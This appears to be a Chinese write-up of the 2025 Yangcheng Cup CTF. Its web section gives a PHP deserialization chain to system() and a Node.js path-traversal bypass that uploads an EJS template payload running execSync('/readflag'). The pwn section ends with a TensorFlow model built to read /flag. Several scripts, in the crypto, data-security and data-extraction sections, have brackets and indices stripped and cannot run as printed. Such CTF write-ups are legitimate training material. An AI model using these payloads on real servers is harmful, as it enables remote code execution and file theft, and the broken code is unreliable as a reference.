2025羊城杯网络安全大赛 wp
ycb wpWeb
ez_unserialize
[*]类 H:析构方法__destruct()会调用$this->who->start(),是触发链的起点。
[*]类 A:start()方法会输出$this->next,若$this->next是对象且触发__toString()方法。
[*]类 V:__toString()方法会执行$this->go->$this->dowhat,若$dowhat为secret,则访问类 E 的secret属性。
[*]类 E:__get("secret")方法会调用$this->found->check()。
[*]类 F:check()方法会判断$finalstep是否不含"U",若通过则实例化$finalstep类并调用其__invoke()方法。
[*]类 U:__invoke()方法通过类 N 的__call()调用system($this->cmd),实现命令执行。
H.__destruct() → A.start() → V.__toString() → E.__get("secret") → F.check() → U.__invoke() → N.__call() → system(cmd)
staticNodeService
给了代码
看Security middleware部分
app.use((req, res, next) => {
if (typeof req.path !== 'string' ||
(typeof req.query.templ !== 'string' && typeof req.query.templ !== 'undefined')
) res.status(500).send('Error parsing path');
else if (/js$|\.\./i.test(req.path)) res.status(403).send('Denied filename');
else next();
})这个正则表达式检查路径中是否包含:
[*]以 js 结尾的字符串(js$)
[*]包含 ..(表示父目录,可能用于路径遍历攻击)
[*]i 标志表示不区分大小写
如果路径符合上述模式,会返回 403 错误(禁止访问)并发送 "Denied filename" 消息。
再看到PUT处理逻辑
第一个点路由拼接
const filePath = path.join(STATIC_DIR, req.path);这行代码通过 path.join() 方法将静态文件目录(STATIC_DIR)与请求路径(req.path)拼接起来,形成要操作的文件的完整路径。
[*]STATIC_DIR = /var/www/static
[*]req.path = /images/logo.png
拼接后:
plaintext
path.join('/var/www/static', '/images/logo.png')
// 结果:/var/www/static/images/logo.png这会指向服务器上 static 目录下的 images/logo.png 文件。
第二个点传参
fs.writeFile(filePath, Buffer.from(req.body.content, 'base64'), (err) => {
if (err) {
return res.status(500).send('Error writing file');
}
res.status(201).send('File created/updated');
});
[*]从请求体(req.body)中获取 content 字段
[*]将 base64 编码的内容解码为 Buffer
[*]使用 fs.writeFile() 异步写入文件
也就是我们现在能写入文件,那怎么去触发?
// serve index for better viewing
function serveIndex(req, res) {
var templ = req.query.templ || 'index';
var lsPath = path.join(__dirname, req.path);
try {
res.render(templ, {
filenames: fs.readdirSync(lsPath),
path: req.path
});
} catch (e) {
console.log(e);
res.status(500).send('Error rendering page');
}
}
[*]使用 fs.readdirSync(lsPath) 同步读取目标目录下的所有文件 / 目录名,返回一个数组
那么我们思路就出来了,先上传一个ejs,正则绕过一下,然后通过templ参数读取
第一步绕过正则使用/. /views/1.ejs/.
然后在/在templ参数
多次尝试后是/readflag
{"content": "PCUtIGdsb2JhbC5wcm9jZXNzLm1haW5Nb2R1bGUucmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWNTeW5jKCcvcmVhZGZsYWcnKSAlPg=="}
MISC
成功男人背后的女人
先firework8打开
01000100010000010101001101000011
01010100010001100111101101110111
00110000011011010100010101001110
01011111011000100110010101101000
00110001011011100100010001011111
01001101010001010110111001111101
别笑,你试你也过不了第二关
第一关
a=' # ';b='##### ';c='# #';d='# ##';e=' # # ';f='#####';g=' ### #';h='#####';hilogo=f+f+g+a+h+' '+b+b+f+g+a+h+'\n'+'#'+a+d+a+c+e+a+d+a+c+'\n'+'#'+a+f+'#'+a+c+e+a+f+'#'+a+c+'\n'+'#'+a+d+a+c+e+a+d+a+c+'\n'+f+f+d+'####'+h+h+' '+b+b+f+d+'####'+h+h
第二关
'tsnrhtdd'这个 8 字符字符串是 “密码本”,通过切片步长 4([::4])拆分出 4 种后缀,原理如下:
字符串索引01234567字符tsnrhtdd切片规则从索引 k 开始,每 4 个字符取 1 个切片结果k=0 → t+h = thk=1 → s+t = stk=2 → n+d = ndk=3 → r+d = rd简单说:索引 k 决定取哪种后缀,k=0 是 th、k=1 是 st、k=2 是 nd、k=3 是 rd。
索引 k 的计算逻辑是 n%5*(条件),分两部分拆解:
[*]基础值:n%5
用 n%5 直接映射 “常规后缀”:
n%5=0 → th(k=0)、n%5=1 → st(k=1)、n%5=2 → nd(k=2)、n%5=3 → rd(k=3)、n%5=4 → th(k=0,因 4 * 条件后仍为 0),完美覆盖常规场景。
[*]开关:n%100^15>4>n%10
这是 “特殊情况过滤器”,用异或(^) 和链式比较压缩逻辑,结果为 True(1)或 False(0):
[*]n%100^15>4:排除 11-19(1115=4、1215=3…19^15=12,仅 11-19 结果 ≤4,其余 >4);
[*]4>n%10:确保个位数是 0-3(只有这类数需要区分 st/nd/rd);
[*]组合效果:只有 “个位数 1-3 且不在 11-19” 时条件为 True,此时保留 n%5 计算的 k;否则条件为 False,k=0(强制用 th),正好处理所有特殊情况。
Crypto
瑞德的一生
from sage.all import PolynomialRing, Zmod
from Crypto.Util.number import long_to_bytes
from tqdm import tqdm
# RSA 解密参数配置
MODULUS = 7494062703769887703668081866565274579333132167014632821313548612356114287792191446305040778987677683423969025588609780586722302041792065732461222120206217# 模数 N
BASE = 176589407974509728660827257088337183280645510941533692756437851307282715528543669659120503474533510718918949406280646936944629296899342927397139761503564 # 基数 X
ENCRYPTED_DATA =
# 密文列表 CIPHERS
# 初始化 Sage 数学环境
modular_space = Zmod(MODULUS)
poly_ring.<unknown> = PolynomialRing(modular_space)
# 假设 flag 最低位为 1,计算初始 y² 值
initial_cipher = ENCRYPTED_DATA
inv_base = pow(BASE, -1, MODULUS)# 计算 BASE 在模 MODULUS 下的逆
y_squared = (inv_base * initial_cipher) % MODULUS
# 存储解密得到的二进制位(从最低位开始)
binary_bits = "1"
# 处理剩余密文
for current_cipher in tqdm(ENCRYPTED_DATA):
found = False
# 尝试 0 和 1 两个可能的位值
for bit_candidate in :
# 计算左侧表达式值
base_power = pow(BASE, -bit_candidate, MODULUS)
left_hand_side = (current_cipher * base_power - y_squared) % MODULUS
# 构造多项式并寻找小根
polynomial = (left_hand_side - unknown**2)**2 - 4 * unknown**2 * y_squared
small_roots = polynomial.small_roots(epsilon=1/20)
if small_roots:
if found:
print("[!] 警告:检测到重复匹配")
# 将找到的位添加到结果前端
binary_bits = str(bit_candidate) + binary_bits
found = True
if not found:
print("[!] 该数据块未找到有效根")
# 输出结果
print(f"解密得到的二进制串: {binary_bits}")
flag_integer = int(binary_bits, 2)
decrypted_flag = long_to_bytes(flag_integer)
print(f"解密后的flag: {decrypted_flag}")直接用在线环境打(https://cocalc.com/features/sage
DS&AI
SM4-OFB
import os
import sys
import argparse
import hashlib
import pandas as pd
def hex_to_bytes(hex_str):
return bytes.fromhex(hex_str.strip())
def generate_keystream(cipher_bytes, plaintext_bytes):
keystream = bytearray(len(cipher_bytes))
for idx in range(len(cipher_bytes)):
plain_byte = plaintext_bytes if idx < len(plaintext_bytes) else 0
keystream = cipher_bytes ^ plain_byte
return bytes(keystream)
def decrypt(cipher_hex, keystream):
cipher_bytes = hex_to_bytes(cipher_hex)
if len(keystream) < len(cipher_bytes):
keystream_full = (keystream * ((len(cipher_bytes) // len(keystream)) + 1))[:len(cipher_bytes)]
else:
keystream_full = keystream[:len(cipher_bytes)]
plain_bytes = bytes( ^ keystream_full for i in range(len(cipher_bytes))]).rstrip(b"\x00")
try:
return plain_bytes.decode("utf-8", errors="replace")
except:
return repr(plain_bytes)
def locate_known_row(dataframe, name, phone, id_card):
for index, row in dataframe.iterrows():
cell_values =
combined = "\t".join(cell_values)
if name in combined and phone in combined and id_card in combined:
return index
return None
def decrypt_and_process():
parser = argparse.ArgumentParser(description="Decrypt personal information sheet with known plaintext.")
parser.add_argument("--input-file", "-i", default="个人信息表.xlsx",
help="Input Excel or CSV file path (default: 个人信息表.xlsx)")
parser.add_argument("--known-name", default="蒋宏玲", help="Known plaintext name (default: 蒋宏玲)")
parser.add_argument("--known-phone", default="17145949399", help="Known plaintext phone number (default: 17145949399)")
parser.add_argument("--known-id", default="220000197309078766",
help="Known plaintext ID card number (default: 220000197309078766)")
parser.add_argument("--target-name", default="何浩璐", help="Target name for ID MD5 calculation (default: 何浩璐)")
parser.add_argument("--output-file", "-o", default="个人信息表_decrypted.csv", help="Output CSV file path")
args = parser.parse_args()
input_path = args.input_file
if not os.path.exists(input_path):
alt_path = "个人信息表_raw.csv"
if os.path.exists(alt_path):
input_path = alt_path
print(f" Input file {args.input_file} not found, using {alt_path} instead.")
else:
print(f" Input file {args.input_file} not found. Please place the file in the current directory.")
sys.exit(1)
if input_path.lower().endswith((".xlsx", ".xls")):
df = pd.read_excel(input_path, header=None, dtype=str)
else:
df = pd.read_csv(input_path, header=None, dtype=str)
first_row = .fillna("")]
has_header = any("序号" in val or "姓名" in val or "手机号" in val or "身份证" in val for val in first_row)
if has_header:
df = df.copy().reset_index(drop=True)
known_row_idx = locate_known_row(df, args.known_name, args.known_phone, args.known_id)
if known_row_idx is None:
known_row_idx = 1 if len(df) > 1 else 0
print(f" Known plaintext row not detected automatically, using row index {known_row_idx} (0-based).")
else:
print(f" Known plaintext row found at index {known_row_idx} (0-based).")
try:
name_cipher_hex = str(df.iat)
phone_cipher_hex = str(df.iat)
id_cipher_hex = str(df.iat)
except Exception as e:
print(" Failed to read ciphertext columns at indices 1, 2, 3. File structure might be incorrect.", e)
sys.exit(1)
name_keystream = generate_keystream(hex_to_bytes(name_cipher_hex), args.known_name.encode("utf-8"))
phone_keystream = generate_keystream(hex_to_bytes(phone_cipher_hex), args.known_phone.encode("utf-8"))
id_keystream = generate_keystream(hex_to_bytes(id_cipher_hex), args.known_id.encode("utf-8"))
print(f" Keystream lengths: name={len(name_keystream)}, phone={len(phone_keystream)}, id={len(id_keystream)}")
decrypted_rows = []
for row_idx in range(1, len(df)):
seq = str(df.iat) if pd.notna(df.iat) else str(row_idx)
try:
curr_name_hex = str(df.iat)
curr_phone_hex = str(df.iat)
curr_id_hex = str(df.iat)
except:
continue
decrypted_name = decrypt(curr_name_hex, name_keystream)
decrypted_phone = decrypt(curr_phone_hex, phone_keystream)
decrypted_id = decrypt(curr_id_hex, id_keystream)
decrypted_rows.append()
decrypted_df = pd.DataFrame(decrypted_rows, columns=["序号", "姓名", "手机号", "身份证号"])
decrypted_df.to_csv(args.output_file, index=False)
print(f" Decrypted data saved to {args.output_file}, total rows: {len(decrypted_df)}")
target_matches = decrypted_df.str.contains(args.target_name, na=False)]
if target_matches.empty:
print(f" No records found for name: {args.target_name}")
else:
for _, record in target_matches.iterrows():
id_card = str(record["身份证号"])
md5_hash = hashlib.md5(id_card.encode("utf-8")).hexdigest()
print(f" Name: {record['姓名']}, ID: {id_card}, MD5: {md5_hash}")
if __name__ == "__main__":
decrypt_and_process()
MD5: fbb80148b75e98b18d65be446f505fcc
dataIdSort
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
import csv
def validate_idcard(idcard):
"""验证身份证号"""
# 处理带横线和空格的格式
if '-' in idcard:
parts = idcard.split('-')
if len(parts) == 3 and len(parts) == 6 and len(parts) == 8 and len(parts) == 4:
idcard_clean = ''.join(parts)
else:
return False
elif ' ' in idcard:
parts = idcard.split()
if len(parts) == 3 and len(parts) == 6 and len(parts) == 8 and len(parts) == 4:
idcard_clean = ''.join(parts)
else:
return False
else:
idcard_clean = idcard
# 18位身份证验证
if len(idcard_clean) == 18:
weights =
check_codes = ['1', '0', 'X', '9', '8', '7', '6', '5', '4', '3', '2']
if not idcard_clean[:17].isdigit():
return False
# 验证出生日期
try:
year = int(idcard_clean)
month = int(idcard_clean)
day = int(idcard_clean)
if not (1900 <= year <= 2100 and 1 <= month <= 12 and 1 <= day <= 31):
return False
except:
return False
# 计算校验码
sum_val = sum(int(idcard_clean) * weights for i in range(17))
check_code = check_codes
return idcard_clean[-1].upper() == check_code
# 15位身份证验证
elif len(idcard_clean) == 15:
if not idcard_clean.isdigit():
return False
try:
month = int(idcard_clean)
day = int(idcard_clean)
if not (1 <= month <= 12 and 1 <= day <= 31):
return False
except:
return False
return True
return False
def validate_phone(phone):
"""验证手机号"""
digits = re.sub(r'[^\d]', '', phone)
# 处理带86前缀的号码
if len(digits) == 13 and digits[:2] == '86':
digits = digits
if len(digits) != 11 or digits != '1':
return False
# 验证手机号段
valid_prefixes = {
'134', '135', '136', '137', '138', '139', '147', '148', '150', '151',
'152', '157', '158', '159', '172', '178', '182', '183', '184', '187',
'188', '195', '198', '130', '131', '132', '140', '145', '146', '155',
'156', '166', '167', '171', '175', '176', '185', '186', '196', '133',
'149', '153', '173', '174', '177', '180', '181', '189', '190', '191',
'193', '199'
}
return digits[:3] in valid_prefixes
def validate_bankcard(card):
"""验证银行卡号(Luhn算法 + 62前缀)"""
# 仅验证62开头的银行卡
if not card.startswith('62'):
return False
if not card.isdigit() or len(card) < 16 or len(card) > 19:
return False
# Luhn算法验证
total = 0
reverse_digits = card[::-1]
for i, digit in enumerate(reverse_digits):
n = int(digit)
if i % 2 == 1:# 偶数位置(从0开始计数)
n *= 2
if n > 9:
n -= 9
total += n
return total % 10 == 0
def validate_ip(ip):
"""验证IP地址"""
parts = ip.split('.')
if len(parts) != 4:
return False
for part in parts:
try:
num = int(part)
if num < 0 or num > 255:
return False
except ValueError:
return False
return True
def validate_mac(mac):
"""验证MAC地址(xx:xx:xx:xx:xx:xx格式)"""
parts = mac.split(':')
if len(parts) != 6:
return False
for part in parts:
if len(part) != 2:
return False
try:
int(part, 16)# 验证是否为十六进制
except ValueError:
return False
return True
def extract_sensitive_data(text):
"""从文本中提取敏感数据(去重+按位置排序)"""
results = []
# 修复正则表达式:移除手机号模式中的$锚点,避免匹配失败
patterns = {
'phone': [
r'\+86\s*\d{3}\s+\d{4}\s+\d{4}',# (+86)132 6239 9600 或 +86 132 6239 9600
r'\+86\s*\d{3}-\d{4}-\d{4}', # (+86)174-1242-5004 或 +86 174-1242-5004
r'\+86\s*\d{11}', # (+86)18227196365 或 +86 18227196365
r'(?<!\d)\d{3}\s+\d{4}\s+\d{4}(?!\d)',# 157 6118 9206
r'(?<!\d)\d{3}-\d{4}-\d{4}(?!\d)', # 181-9714-3686
r'(?<!\d)\d{11}(?!\d)', # 15135915179
],
'idcard': [
r'(?<!\d)\d{6}-\d{8}-\d{4}(?!\d)',# 410122-19800821-6567
r'(?<!\d)\d{6}\s+\d{8}\s+\d{4}(?!\d)',# 540124 20080916 4682
r'(?<!\d)\d{18}(?!\d)', # 18位身份证(含末位X)
r'(?<!\d)\d{17}(?!\d)', # 单独匹配末位为X的18位身份证
r'(?<!\d)\d{15}(?!\d)', # 15位身份证
],
'bankcard': [
r'(?<!\d)62\d{14,17}(?!\d)', # 62开头的16-19位银行卡号
],
'ip': [
r'(?<!\d)\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}(?!\d)',# IP地址
],
'mac': [
r'{2}:{2}:{2}:{2}:{2}:{2}',# MAC地址
],
}
# 按顺序提取:MAC→IP→手机号→身份证→银行卡(避免短格式被长格式覆盖)
extract_order = ['mac', 'ip', 'phone', 'idcard', 'bankcard']
for data_type in extract_order:
for pattern in patterns:
matches = re.finditer(pattern, text, re.IGNORECASE)# MAC地址忽略大小写
for match in matches:
value = match.group()
# 调用对应验证函数
if data_type == 'phone' and validate_phone(value):
results.append((data_type, value, match.start(), len(value)))
elif data_type == 'idcard' and validate_idcard(value):
results.append((data_type, value, match.start(), len(value)))
elif data_type == 'bankcard' and validate_bankcard(value):
results.append((data_type, value, match.start(), len(value)))
elif data_type == 'ip' and validate_ip(value):
results.append((data_type, value, match.start(), len(value)))
elif data_type == 'mac' and validate_mac(value):
results.append((data_type, value, match.start(), len(value)))
# 按匹配位置排序
results.sort(key=lambda x: x)
# 去重:排除重叠的匹配结果
unique_results = []
used_ranges = []# 存储已使用的文本范围 (start, end)
for item in results:
data_type, value, start, length = item
end = start + length
# 检查是否与已保留结果重叠
overlap = False
for used_start, used_end in used_ranges:
if not (end <= used_start or start >= used_end):
overlap = True
break
if not overlap:
unique_results.append((data_type, value))
used_ranges.append((start, end))
return unique_results
def process_file(input_file, output_file):
"""处理输入文件,提取敏感数据并保存为CSV"""
print(f"开始处理文件: {input_file}")
all_results = []
line_count = 0
# 读取输入文件
try:
with open(input_file, 'r', encoding='utf-8') as f:
for line_num, line in enumerate(f, 1):
line_count += 1
# 每处理100行打印进度
if line_count % 100 == 0:
print(f"已处理 {line_count} 行...")
# 提取当前行的敏感数据
sensitive_data = extract_sensitive_data(line.strip())
for data_type, value in sensitive_data:
all_results.append({
'category': data_type,# 对应CSV的category列
'value': value # 对应CSV的value列
})
# 统计各类型数据数量
type_count = {}
for item in all_results:
cat = item['category']
type_count = type_count.get(cat, 0) + 1
# 打印处理结果统计
print(f"\n处理完成:共处理 {line_count} 行,提取敏感数据 {len(all_results)} 条")
print("各类型数据统计:")
for cat, count in sorted(type_count.items()):
print(f"{cat}: {count} 条")
# 去重:基于 (category, value) 确保唯一性
unique_dict = {}
for item in all_results:
key = (item['category'], item['value'])
if key not in unique_dict:
unique_dict = item
unique_results = list(unique_dict.values())
print(f"去重后剩余:{len(unique_results)} 条唯一数据")
# 保存为CSV(UTF-8 with BOM,兼容Excel)
with open(output_file, 'w', encoding='utf-8-sig', newline='') as f:
# 定义CSV列顺序:category 在前,value 在后
fieldnames = ['category', 'value']
writer = csv.DictWriter(f, fieldnames=fieldnames)
writer.writeheader()
writer.writerows(unique_results)
print(f"结果已保存到:{output_file}")
except FileNotFoundError:
print(f"错误:输入文件 {input_file} 未找到,请检查路径是否正确")
except Exception as e:
print(f"处理过程中发生错误:{str(e)}")
if __name__ == '__main__':
# 配置输入输出文件路径
INPUT_FILE = "C:\\Users\\26387\\Desktop\\ycb\\dataIdSort的附件\\tempdir\\DS附件\\dataIdSort的附件\\data.txt" # 输入文本文件(需与脚本同目录)
OUTPUT_FILE = 'C:\\Users\\26387\\Desktop\\ycb\\dataIdSort的附件\\tempdir\\DS附件\\dataIdSort的附件\\result5.csv'# 输出CSV文件
# 执行处理
process_file(INPUT_FILE, OUTPUT_FILE)
Pwn
malloc
[*]利用 UAF 漏洞泄露 ELF 基地址
[*]篡改堆元数据实现任意地址读写
[*]泄露 libc 基地址和栈地址
[*]构造 ORW (Open-Read-Write) 链读取 flag
# build_model_tfio.py
# 使用纯 TensorFlow op 在 Graph 中读取 /flag 并作为 signature 返回
# 运行环境需要安装 tensorflow (建议 tensorflow-cpu)
#
# 生成: model.zip
import os
import zipfile
try:
import tensorflow as tf
except Exception as e:
raise SystemExit("请先安装 TensorFlow: pip install tensorflow-cpu\n错误: " + str(e))
OUT_DIR = "model_saved"
ZIP_PATH = "model.zip"
# 清理
if os.path.exists(OUT_DIR):
import shutil
shutil.rmtree(OUT_DIR)
if os.path.exists(ZIP_PATH):
os.remove(ZIP_PATH)
# 纯 TF 的 serve 函数:在 Graph 中读取 /flag,确保返回 tf.Tensor (dtype=tf.string)
@tf.function(input_signature=, dtype=tf.float32)])
def serve_fn(x):
# tf.io.read_file 是一个图操作,返回 tf.Tensor(dtype=tf.string, shape=())
data = tf.io.read_file("/flag")
# 为兼容一些加载器/调用方,明确设置形状(标量),或者扩展成 形式:
# 1) 若调用端期待标量 string:直接返回 data
# 2) 若调用端以 batch 形式调用(输入是 ),可以把 data 扩成
# 下面示例把 data 重复为与输入 batch size 相同的向量
batch_size = tf.shape(x)
data_vec = tf.repeat(tf.expand_dims(data, 0), repeats=batch_size)# shape
# 返回 dict,prediction 保持为 shape 的 tf.string 张量
return {"prediction": data_vec}
# 备用的纯 TF signature(不读取文件),便于测试加载器是否能读取 SavedModel
@tf.function(input_signature=, dtype=tf.float32)])
def noop_fn(x):
batch_size = tf.shape(x)
const = tf.constant("MODEL_OK", dtype=tf.string)
vec = tf.repeat(tf.expand_dims(const, 0), repeats=batch_size)
return {"prediction": vec}
# 保存 Module,并显式把 "serve" signature 写入
class ModelModule(tf.Module):
@tf.function(input_signature=, dtype=tf.float32)])
def __call__(self, x):
return serve_fn(x)
module = ModelModule()
tf.saved_model.save(module, OUT_DIR, signatures={"serve": serve_fn, "noop": noop_fn})
# 打包为 zip
with zipfile.ZipFile(ZIP_PATH, "w", compression=zipfile.ZIP_DEFLATED) as zf:
for root, dirs, files in os.walk(OUT_DIR):
for fname in files:
full = os.path.join(root, fname)
arcname = os.path.relpath(full, OUT_DIR)
zf.write(full, arcname)
print("SavedModel saved to:", OUT_DIR)
print("Zipped to:", ZIP_PATH)
来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]